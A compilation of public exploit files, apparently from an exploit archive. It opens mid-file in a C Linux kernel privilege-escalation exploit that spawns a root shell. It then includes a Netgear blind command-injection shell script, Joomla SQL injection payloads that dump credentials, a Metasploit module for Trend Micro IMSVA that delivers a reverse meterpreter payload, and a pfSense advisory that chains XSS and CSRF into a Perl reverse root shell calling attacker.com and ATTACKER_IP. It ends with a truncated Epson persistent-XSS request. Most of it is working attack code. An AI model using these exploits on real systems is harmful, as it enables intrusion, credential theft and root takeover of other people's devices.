exit(EXIT_FAILURE);
}
}
void udp_fifo_kfree(struct udp_fifo_handle* handle) {
char buffer[2048];
int rv = recv(handle->fds[1], &buffer[0], 1536, 0);
if (rv != 1536) {
perror("recv()");
exit(EXIT_FAILURE);
}
}
int timer_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("socket(SOCK_DGRAM)");
exit(EXIT_FAILURE);
}
return s;
}
#define CONF_RING_FRAMES 1
void timer_schedule(int handle, int timeout) {
int optval = TPACKET_V3;
int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,
&optval, sizeof(optval));
if (rv != 0) {
perror("setsockopt(PACKET_VERSION)");
exit(EXIT_FAILURE);
}
struct tpacket_req3 tp;
memset(&tp, 0, sizeof(tp));
tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
tp.tp_block_nr = 1;
tp.tp_frame_size = getpagesize();
tp.tp_frame_nr = CONF_RING_FRAMES;
tp.tp_retire_blk_tov = timeout;
rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,
(void *)&tp, sizeof(tp));
if (rv != 0) {
perror("setsockopt(PACKET_RX_RING)");
exit(EXIT_FAILURE);
}
}
void socket_sendmmsg(int sock, char *buffer) {
struct mmsghdr msg[1];
msg[0].msg_hdr.msg_iovlen = 0;
// Buffer to kmalloc.
msg[0].msg_hdr.msg_control = &buffer[0];
msg[0].msg_hdr.msg_controllen = 2048;
// Make sendmmsg exit easy with EINVAL.
msg[0].msg_hdr.msg_name = "root";
msg[0].msg_hdr.msg_namelen = 1;
int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
if (rv == -1 && errno != EINVAL) {
perror("[-] sendmmsg()");
exit(EXIT_FAILURE);
}
}
void sendmmsg_kmalloc_kfree(int port, char *buffer) {
int sock[2];
int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);
if (rv != 0) {
perror("socketpair()");
exit(EXIT_FAILURE);
}
socket_sendmmsg(sock[0], buffer);
close(sock[0]);
}
// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *
void dccp_connect_pad(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;
handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("bind()");
exit(EXIT_FAILURE);
}
rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror("listen()");
exit(EXIT_FAILURE);
}
handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("connect(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kmalloc_pad() {
int i;
struct dccp_handle handle;
for (i = 0; i < 4; i++) {
dccp_connect_pad(&handle, port++);
}
}
void timer_kmalloc_pad() {
int i;
for (i = 0; i < 4; i++) {
socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
}
}
void udp_kmalloc_pad() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_PAD / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
}
void kmalloc_pad() {
debug("dccp kmalloc pad");
dccp_kmalloc_pad();
debug("timer kmalloc pad");
timer_kmalloc_pad();
debug("udp kmalloc pad");
udp_kmalloc_pad();
}
void udp_kmalloc_warm() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_WARM / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
for (i = 0; i < KMALLOC_WARM / 16; i++) {
for (j = 0; j < 16; j++)
udp_fifo_kfree(&uh[i]);
}
}
void kmalloc_warm() {
udp_kmalloc_warm();
}
// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *
// Executes func(arg) from interrupt context multiple times.
void kernel_exec_irq(void *func, unsigned long arg) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3, uh4;
char dummy[2048];
char buffer[2048];
printf("[.] scheduling %p(%p)\n", func, (void *)arg);
memset(&dummy[0], 0xc3, 2048);
init_timer_buffer(&buffer[0], func, arg);
udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);
udp_fifo_init(&uh4);
debug("kmalloc pad");
kmalloc_pad();
debug("kmalloc warm");
kmalloc_warm();
debug("dccp init");
dccp_init(&dh, port++);
debug("dccp kmalloc kfree");
dccp_kmalloc_kfree(&dh);
debug("catch 1");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);
debug("dccp kfree again");
dccp_kfree_again(&dh);
debug("catch 2");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);
int timers[CATCH_FIRST];
debug("catch 1 -> timer");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
timers[i] = timer_kmalloc();
}
debug("catch 1 small");
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);
debug("schedule timers");
for (i = 0; i < CATCH_FIRST; i++)
timer_schedule(timers[i], 500);
debug("catch 2 -> overwrite timers");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh2);
udp_fifo_kmalloc(&uh3, &buffer[0]);
}
debug("catch 2 small");
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);
printf("[.] waiting for the timer to execute\n");
debug("wait");
sleep(1);
printf("[.] done\n");
}
void disable_smep_smap() {
printf("[.] disabling SMEP & SMAP\n");
kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);
printf("[.] SMEP & SMAP should be off now\n");
}
// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *
// Executes func() from process context.
void kernel_exec(void *func) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3;
char dummy[2048];
char buffer[2048];
printf("[.] executing %p\n", func);
memset(&dummy[0], 0, 2048);
init_skb_buffer(&buffer[0], func);
udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);
debug("kmalloc pad");
kmalloc_pad();
debug("kmalloc warm");
kmalloc_warm();
debug("dccp init");
dccp_init(&dh, port++);
debug("dccp kmalloc kfree");
dccp_kmalloc_kfree(&dh);
debug("catch 1");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);
debug("dccp kfree again:");
dccp_kfree_again(&dh);
debug("catch 2");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);
debug("catch 1 -> overwrite");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
sendmmsg_kmalloc_kfree(port++, &buffer[0]);
}
debug("catch 2 -> free & trigger");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kfree(&uh2);
debug("catch 1 & 2");
for (i = 0; i < CATCH_AGAIN; i++)
udp_fifo_kmalloc(&uh3, &dummy[0]);
printf("[.] done\n");
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root_payload(void) {
commit_creds(prepare_kernel_cred(0));
}
void get_root() {
printf("[.] getting root\n");
kernel_exec(&get_root_payload);
printf("[.] should be root now\n");
}
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
void exec_shell() {
char *shell = "/bin/bash";
char *args[] = {shell, "-i", NULL};
execve(shell, args, NULL);
}
void fork_shell() {
pid_t rv;
rv = fork();
if (rv == -1) {
perror("fork()");
exit(EXIT_FAILURE);
}
if (rv == 0) {
exec_shell();
}
}
bool is_root() {
// We can't simple check uid, since we're running inside a namespace
// with uid set to 0. Try opening /etc/shadow instead.
int fd = open("/etc/shadow", O_RDONLY);
if (fd == -1)
return false;
close(fd);
return true;
}
void check_root() {
printf("[.] checking if we got root\n");
if (!is_root()) {
printf("[-] something went wrong =(\n");
printf("[!] don't kill the exploit binary, the kernel will crash\n");
return;
}
printf("[+] got r00t ^_^\n");
printf("[!] don't kill the exploit binary, the kernel will crash\n");
// Fork and exec instead of just doing the exec to avoid freeing
// skbuffs and prevent crashes due to a allocator corruption.
fork_shell();
}
static bool write_file(const char* file, const char* what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
if (system("/sbin/ifconfig lo up") != 0) {
perror("system(/sbin/ifconfig lo up)");
exit(EXIT_FAILURE);
}
printf("[.] namespace sandbox setup successfully\n");
}
int main() {
setup_sandbox();
#if SMEP_SMAP_BYPASS
disable_smep_smap();
#endif
get_root();
check_root();
while (true) {
sleep(100);
}
return 0;
}
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2:
print "./netgearpwn_2.py <router ip>"
return
spawnShell()
def execute(cmd): #Escaping basic sanitization
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
return
def spawnShell():
print "Dropping a shell-like environment (blind OS injection)"
print "To test it type 'reboot'"
while True:
cmd = raw_input("[blind $] ")
execute(cmd)
if __name__ == "__main__":
main()
#2017-02-25 by SivertPL
#Tak, to ja.
# # # # #
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_gnosis
# Date: 25.02.2017
# Vendor Homepage: http://hypermodern.org/
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
# Version: 1.1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
# # # # #
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in the Trend Micro
IMSVA product. An authenticated user can execute a terminal command under
the context of the web server user which is root. Besides, default installation
of IMSVA comes with a default administrator credentials.
saveCert.imss endpoint takes several user inputs and performs blacklisting.
After that it use them as argument of predefined operating system command
without proper sanitation. However,due to improper blacklisting rule it's possible to inject
arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
This module was tested against IMSVA 9.1-1600.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x2f\x22"
},
'DefaultOptions' =>
{
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jan 15 2017',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
Opt::RPORT(8445)
]
)
end
def login
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("Attempting to login with #{user}:#{pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.imss'),
'vars_post' => {
'userid' => user,
'pwdfake' => Rex::Text::encode_base64(pass)
}
})
if res && res.body.include?("The user name or password you entered is invalid")
fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
end
cookie = res.get_cookies
if res.code == 302 && cookie.include?("JSESSIONID")
jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
print_good("Authenticated as #{user}:#{pass}")
return jsessionid
end
nil
end
def exploit
jsessionid = login
unless jsessionid
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
end
# Somehow java stores last visited url on session like viewstate!
# Visit form before submitting it. Otherwise, it will cause a crash.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'initCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}"
})
if !res or !res.body.include?("Transport Layer Security")
fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
end
# Random string that will be used as a cert name, state, email etc.
r = Rex::Text::rand_text_alphanumeric(5)
print_status("Delivering payload...")
# Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'saveCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}",
'vars_get' => {
'mode' => 0
},
'vars_post' => {
'certName' => r,
'certType' => 0,
'keyLength' => 2048,
'countryCode' => 'TR',
'state' => r,
'locality' => r,
'org' => r,
'orgUnit' => r,
'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
'emailAddress' => "#{r}@mail.com",
'validDays' => '',
'id' => '',
}
})
end
end
# # # # #
# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
# Google Dork: N/A
# Date: 25.02.2017
# Vendor Homepage: https://www.cmsplugin.com/
# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
# Version: 3.8.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
# '+order+by+10-- -
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Coupon v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_coupon
# Date: 03.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/coupon/
# Demo: http://demo.joomla6teen.com/couponmanager/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL]
# For example;
# DATABASE > demojoom_coupon3
# TABLES > wl6xp_users
# COLUMNS > username, password
# DATA
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# admin:$2y$10$IeBQiHyJNpZ7mVVNlmW7..Xr5I4tSTlN5Dq7QVltnjtWmaWu2J4
# Etc..
# # # # #
######################################################################
# Exploit Title: pfSense 2.3.2 XSS - CSRF-bypass & Reverse-root-shell
# Date: 01/03/2017
# Author: Yann CAM @ASafety / Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.3.2
# Category: XSS, CSRF-bypass and Remote root reverse-shell Access
# Google dork:
# Tested on: FreeBSD
######################################################################
pfSense firewall/router distribution description :
======================================================================
pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition
to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package
system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations
ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations
protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the
embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however
it is not our primary focus.
In version 2.3.2 of the distribution, differents XSS vulnerabilities allow CSRF security mechanisms bypass and RCE reverse
root shell can be triggered. It is strongly advised to update to version 2.3.2 available now.
Demonstration video : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
Proof of Concept 1 - Reflected Cross-Site Scripting :
======================================================================
There are several RXSS in GET parameter available on the pfSense WebGui, example :
File status_captiveportal_expire.php lines 69-73 :
$cpzone = $_GET['zone'];
if (isset($_POST['zone'])) {
$cpzone = $_POST['zone'];
}
$cpzone = strtolower($cpzone);
then reflection lines 100-104 :
$tab_array[] = array(gettext("Active Users"), false, "status_captiveportal.php?zone={$cpzone}");
$tab_array[] = array(gettext("Active Vouchers"), false, "status_captiveportal_vouchers.php?zone={$cpzone}");
$tab_array[] = array(gettext("Voucher Rolls"), false, "status_captiveportal_voucher_rolls.php?zone={$cpzone}");
$tab_array[] = array(gettext("Test Vouchers"), false, "status_captiveportal_test.php?zone={$cpzone}");
$tab_array[] = array(gettext("Expire Vouchers"), true, "status_captiveportal_expire.php?zone={$cpzone}");
List of parameters vulnerable to reflected XSS:
* status_captiveportal.php: "order", "zone"
* status_captiveportal_expire.php: "zone"
* status_captiveportal_test.php: "zone"
* status_captiveportal_voucher_rolls.php: "zone"
* status_captiveportal_vouchers.php: "zone"
Result with a direct call to this page (authenticated session) :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script>alert(1337);</script>
These RXSS are through GET parameters, so they are triggered directly on page loading (doesn't need any CSRF token).
CSRF token security mechanism protect only RXSS through POST parameters in the pfSense context.
Proof of Concept 2 - Bypass all CSRF protection via R-XSS :
======================================================================
Via the R-XSS in GET parameter identified previously, it's possible for an attacker to bypass all CSRFMagic mechanisms
in the pfSense WebGUI.
Through this XSS in GET param, an attacker can benefit of the current pfSense context in a victim's browser already
logged as administrator in pfSense web administration interface.
Via this XSS, the attacker can forge his own and hidden request in the victim browser, with :
* Right referer for bypassing anti-CSRF mechanisms
* Request page to get a valid CSRF token to forge final form submissions with admin rights
The next piece of JavaScript-JQuery can make any CSRF with right referer and security token retrieved in pfSense context :
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
If this script is loaded from the previous XSS, all web-forms in the pfSense WebGui can be submitted as a legitimate
and authenticated user (like administrator).
Proof of Concept 3 : R-XSS to CSRF to Remote Reverse root Shell
======================================================================
pfSense distribution provides some internal tools / commands like "perl".
Example of one-liner Perl reverse-root-shell in command line :
[2.3.2-RELEASE][admin@pfSense.localdomain]/usr/local/www: perl -e 'use Socket;$i="[ATTACKER_IP]";$p=[ATTACKER_PORT];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STen(STDERR,">&S");exec("/bin/sh -i");};'
Plus, through the WebGui as administrator, it's possible to execute system command (shell) directly in the web browser as root user :
http://<PFSENSE>/diag_command.php
POST parameter for command execution to this page are (via PHP script) :
txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=[PAYLOAD]&submit=EXECPHP&__csrf_magic=[CSRFTOKEN]
So, by chaining the R-XSS, bypass any anti-CSRF protection and with some AJAX calls with right referer / right CSRF token,
an attacker can gain a full reverse-shell as root on the pfSense :
1/ Step one : the attacker puts a netcat in listen mode on port 4444 on his computer
$ nc -l -vv -p 4444
2/ Step two : the attacker puts the next x.js JavaScript file on his webserver http://attacker.com/x.js :
var hash = window.location.hash.substring(1);
var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);
var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%27%29%3B';
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
// This function use JQuery AJAX object.
// The token var is needed to perform the right CSRF attack with the context referer
function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token
}); // payload of your choice
}
if (trigger){
} else {
var trigger = function(){
// Load JQuery dynamically in the targeted context
var headx = document.getElementsByTagName('head')[0];
var jq = document.createElement('script');
jq.type = 'text/javascript';
jq.src = 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
// Waiting 2 secondes for correct loading of JQuery added dynamically.
// Then, run the first AJAX request in the WebGUI context to retrieve the token
setTimeout('loadToken()', 2000);
};
trigger();
}
3/ Step three : the attacker generates the RXSS / anti-CSRF / RCE-root final URL :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script src="http://attacker.com/x.js"></script>#lhost=[ATTACKER_IP]&lport=[ATTACKER_PORT]
4/ Finaly, the attacker sends this URL (hidden via bitly.com for example) to a pfSense sysadmin and wait for the reverse root shell.
Tested and validated with Firefox latest version 50.1.0.
I have created some BeEF modules to exploit the same vulnerability / scenario.
This full PoC can be seen in the demonstration video here : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
pfSense 2.3.2 contains several security mechanisms and security best-practices like:
- X-Frame-Option header
- POST form-submission token anti-CSRF
- Referer checking to protect against CSRF
But just with a simple RXSS in GET, all these security best-practices can be bypassed to gain a full reverse root shell remotely.
Mitigation:
======================================================================
I suggest to double-check all $_GET/$_POST params directly reflected in the pfSense PHP source code without sanitization.
Plus, some HTTP headers can be added in pfSense for a better security, like:
- X-XSS-Protectoin
- X-Content-Type-Options
- CSP header
- Etc.
Solution:
======================================================================
2017-02-20: Release 2.3.3
Additional resources :
======================================================================
- www.pfsense.org
- www.synetis.com
- blog.pfsense.org/?p=2325
- www.asafety.fr
- www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
- doc.pfsense.org/index.php/2.3.3_New_Features_and_Changes
- pfsense.org/security/advisories/pfSense-SA-17_01.webgui.asc
- github.com/pfsense/pfsense/pull/3288
- github.com/pfsense/pfsense/pull/3288/commits/9ec212fb11e4b2825acda68279c7e9553186c06d
- github.com/pfsense/pfsense/pull/3288/commits/992dd571bcad6508ccea0f478491183d7c7e3c4c
- github.com/beefproject/beef/commit/2f632bcbcd0a73ff2d300110bfdec81986e88285
Report timeline :
======================================================================
2016-12-17 : Vulnerability found
2016-12-18 : pfSense team alerted with details, PoC, mitigation proposal through github pull request
2016-12-18 : pfSense team feedback via github
2017-02-20 : pfSense 2.3.3 release with fix
2017-02-22 : BeEF module pull request
2017-03-01 : Public advisory
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Researcher @ASafety / Security Consultant @Synetis
Last word :
======================================================================
Thank you to all the pfSense team for professionalism and quality solution despite of these few weaknesses.
--
SYNETIS
CONTACT: www.synetis.com
# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
# Date: 3/3/2017
# Exploit Author: Michael Benich
# Vendor Homepage: https://www.epson-biz.com/
# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
# Version: 1.00
# CVE: CVE-2017-6443
# Contact: benichmt1@protonmail.com // @benichmt1
#####################################################################################
Summary:
Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
Steps to reproduce:
1)Make a POST request using Burp Proxy or other application
------------------------------------------------------------------------------------------
POST /Forms/oadmin_1 HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
------------------------------------------------------------------------------------------
2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
GET /istatus.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
